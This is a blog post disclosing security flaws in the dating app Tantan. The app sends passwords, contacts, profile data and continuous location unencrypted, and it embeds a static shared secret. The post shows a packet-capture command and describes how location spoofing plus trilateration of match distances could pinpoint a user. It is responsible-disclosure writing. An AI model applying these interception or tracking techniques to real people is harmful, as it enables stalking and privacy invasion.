Update: Tantan CEO and Co-founder Yu Wang reached out to me via email to acknowledge these issues. Read his email and my response.
TL;DR: Chinese Tinder clone Tantan is endangering young women and men by failing to use encryption and exposing private data like that made public in the Ashley Madison hack.
It’s no surprise that dating apps like Tinder that open up new ways to reduce risks of dating have been taking the world by storm. China is well ahead of the curve when it comes to social acceptance of meeting people online. Conditioned by three decades of incredibly fast-paced social change, normal, every day folks have been making friends and meeting future spouses online since the early days of QQ.
Dating apps are particularly interesting from an information security perspective because of the sensitivity of the behavior they protect. People are secretive about who they’re dating or hooking up with. Publicly broadcasting your latest love adventures can get you in trouble with friends and family.
Behavior changes when using dating apps. Offered the possibility of meeting a cute new boy or girl, people who otherwise care about their privacy or security of their online accounts throw their good senses to the wind.
Early this year, a new player arrived on the Chinese dating app scene called Tantan. A friend, who will remain nameless, excitedly told me about the app and the cute people that were on it. I had to check it out, I was told.
China clone army strikes again
essentially a Tinder clone. On the surface, the iPhone app seems to be smoother and more refined then the app it copies. However, as we’ll soon find out, looks can be deceiving.
Unlike Tinder, which uses Facebook to log in, Tantan asks you for a phone number to verify you and then has you select a password. As part of the on-boarding process, it asks for the usual social network profile information and asks for permission to use your location so that it can find people to match you with nearby.
Next, it offers to hide you from people you already know if you’re willing to share your contact book with them. I’m not married or sneaking around behind anyone’s back, but I’m certainly not in the business of giving my contact book to an unknown Chinese startup. Later, I would find out that I was very glad I made that decision.
I was impressed by how well Tantan functioned compared to Tinder. It was smoother and more user-friendly. Also happily missing was the poor user experience of jumping between apps that comes from Tinder being built on Facebook.
One thing I was a bit disappointed about was that being in Hong Kong instead of the mainland, the app’s target market, there were few people nearby to meet. The nearest users seemed to be in Shenzhen. Oh well. If I couldn’t explore the beauty of the people on the app, I could always explore the beauty of the app!
Behind the scenes
After playing around with the app for a few minutes, I decide to investigate if the beauty of the app was for real or only skin deep. My first step was to plug my phone into my laptop while running Apple’s Xcode developer tool. This is the tool developers use to build apps for Apple’s products.
One of Xcode’s features allows you to view the console log of your phone. The console log is a scrolling window of text - think of it as a Twitter feed for the apps running on your phone. It lets you know what your phone and the apps on it are doing and helps you track down and fix software bugs.
Apple’s own apps give periodic updates that help developers know what the operating system is doing as it periodically wakes up and puts to sleep various parts of the iPhone that manage power and radio conditions and could otherwise affect developer’s apps. However, professionally written apps usually turn off many these messages when they submit their app to the App Store for performance reasons and to prevent possibly sensitive information from ending up in logs and potentially escaping the device.
Much to my surprise, Tantan’s developers hadn’t turned off their debug messages and tons of interesting information was being sent into console. One of the first things I noticed was that Tantan loads a list of “foul” words that it censors.
I’ll leave deciphering the entire list of words as an exercise for you, my loyal reader (Update: Quartz deciphered them for you!), but a random sampling shows that many of the words have to do with hookups and casual sex. Only platonic or marriage-bound relationships to see here.
Looking up bad words is fun and all, but there were better, more exciting things to see. Scrolling on, I saw the names and addresses of their servers and information about the requests the app was making flashing by.
It seemed strange that an app that appeared so well-written on the surface would be so sloppy underneath. I was interested to look deeper and see if, like so many of the people you meet on dating apps, Tantan’s initial beauty was only mirage.
Next up, I decided to see what sort of information the app was sending and how well it was protected.
I used the
ssh to connect to my home router and fired up the
tcpdump program to see what sort of data was flying around between the Tantan running on my phone and Tantan’s server. I looked up the IP address of Tantan’s server and then started watching and collecting traffic using this command:
tcpdump -i ppp88 host 126.96.36.199 and port 80 -n -s 0 -vvv -w tantan
Data sent between an app and a server should be encrypted so that the dozen or more computers it passes through on its journey through the Internet can’t read it. So, naturally, I expected to see a bunch of encrypted, unreadable data passing through my router between my phone and Tantan’s server.
Much to my surprise, the information sent between my phone and Tantan’s server somewhere on the other side of the Great Firewall deep in Mainland China was completely readable. I could see the password I had just entered, my phone number and all the people I was being matched with. And if I could read it, that means any number of other people could as well.
My next step was to fire up Wireshark to get a better view of what was happening.
Seeing all this nicely structured information flowing back and forth piqued my interest in learning more about just what types of data Tantan was collecting from its users and then leaking to the world.
When your shared secret isn’t secret
Usually when reverse engineering an undocumented API to figure out how it works, you’d have to take a few minutes to set up some tools to decode the encrypted content. However, Tantan’s security failings made it trivial to see how their app and server interact and talk to each other.
The first thing I noticed was they stored a fixed password in the app that the app must provide to its server before the app is even allowed to connect to sign up a new user or log in an existing user. This password, or shared secret, is static and stored in every copy of Tantan downloaded from the App Store.
Ostensibly, the purpose of this shared secret is to prevent third party apps from connecting to the Tantan server, but without encryption the secret wasn’t very secret.
Tantan shares you with the world
Next, I went the process of creating a new user. Tantan asked me to share my country and phone number before it sent me a code by text message allowing me to continue.
After entering the code, it prompted me to select a password and enter information about:
- My gender
- Sexual orientation
- Partner age preferences
All of this information was sent in cleartext, unencrypted, across the Internet.
Selling out your friends
During the sign up process, after creating an account, new users are prompted to share their contacts with Tantan. Tantan promises to hide you from the people in your contacts list. One imagines this is to avoid the potential, umm, social awkwardness, of showing up as a potential match to a coworker, ex-boyfriend or current wife. Think Ashley Madison meets Tinder.
I’m pretty cognizant of permissions I grant apps and hadn’t shared my contact book with Tantan when I originally signed up. Boy was I glad that I made that decision when I found out that sharing your contact book with Tantan results personal details of all the people stored in your phone flying around the Internet for all to see.
The perfect match
Once we’re signed up and we’ve told Tantan (and the world) our gender and age interests, the Tantan app starts asking its server for possible matches. These are the people we’ll be able to swipe left or swipe right, just like on Tinder.
By continuing to look at the unprotected data Tantan is sending us with
tcpdump, we can see that the service sends our phone several possible matches with request. With each potential match comes a lot of fun data about the user. We are sent their age and interests and all of the pictures and videos they’ve added to the service. There’s also a number telling how far the our potential Juliet (or Romeo as your case may be) is away from us.
We can then like or dislike a user and see how the app sends a request to the server with that user’s user id to indicate our preference.
Once we’re matched with a user, that is to say the other person also liked us, we’re able to access this information anytime we want instead of waiting until the person is suggested. And since our connection is not encrypted, so can anyone else!
When you first download Tantan, the app asks for permission to track your location. This is because it matches you with people who are nearby. But what does this really mean? What does it do with your location?
Since we know everything Tantan sends is out in the open, visible to anyone who cares to look to see, we know that it certainly doesn’t treat it with the confidentially one would expect of a close friend with intimate knowledge of your dating life. But still…it probably just asks for you location once in a while?
Wrong. In reality, the app sends your location to Tantan’s server every time it talks to the server…which could be several times a minute.
When an app or web browser connects to a server to ask for some information, it sends metadata along with the request called “headers“. Headers are named as such because they are at the very top, or head, of the request.
In Tantan, your location is sent via a header in each request called
Geolocation. As you can see, our latitude and longitude is sent along with a number indicating how certain of the location your phone is. For example, someone using Tantan on an iPhone in Shenzhen might send the
geo:22.8,114.0;u=165 while someone in Shanghai would send
By plugging these numbers into a mapping application such as Google Maps, someone looking at your Tantan connection can tell not only where you are but also make a reasonable guess of where you’re headed.
The fun doesn’t stop there though. Since the connection is unencrypted, we or anyone on the Internet between our phone and Tantan can change our location. This is useful as a way to meet people in other places. In fact, Tinder actually sells this ability as a premium feature on its service.
Stalking Romeo and Juliet
While spoofing your location to meet people in another location is fun, it is also useful for less noble pursuits. You can use it to find the location of and track anyone that matches with you.
Remember how I showed you earlier how matches also include a number that tells us far the match is from our current location? You can use that information, location spoofing, and some basic high school math to pinpoint the location of your Romeo or Juliet.
You simply need to take note of the how far Juliet is from you at three different places and calculate her location. This makes Tantan incredibly handy if you want to show up outside of her balcony in the middle of the night…creepy might be a better word.
I originally noticed Tantan’s lack of encryption 8 months ago in March 2015. I reached out to the company via both email and Weibo to get in touch with someone with whom I could report these security and privacy problems. I only decided to publish this post after no indication by the company that they either acknowledged the problem or plan to fix it.
After 8 months and numerous app updates, Tantan still doesn’t use the basic security of HTTPS to protect users’ privacy or even their passwords despite being told by Apple that they should.
Why should anyone care?
Thanks to the Ashley Madison hack, we’ve all seen what happens when dating services get compromised and information assumed to be private leaks out into the open: relationships suffer, people get stalked or blackmailed and some even feel the need to end their lives.
Tantan’s negligence in not using basic, industry standard, easy to deploy HTTPS encryption means that their service doesn’t even need to be hacked for this same information to make it out into the public. Destroying your own business from your irresponsibility is your problem. Destroying the lives of your unsuspecting and trusting users is both immoral and unethical. It is everyone’s problem.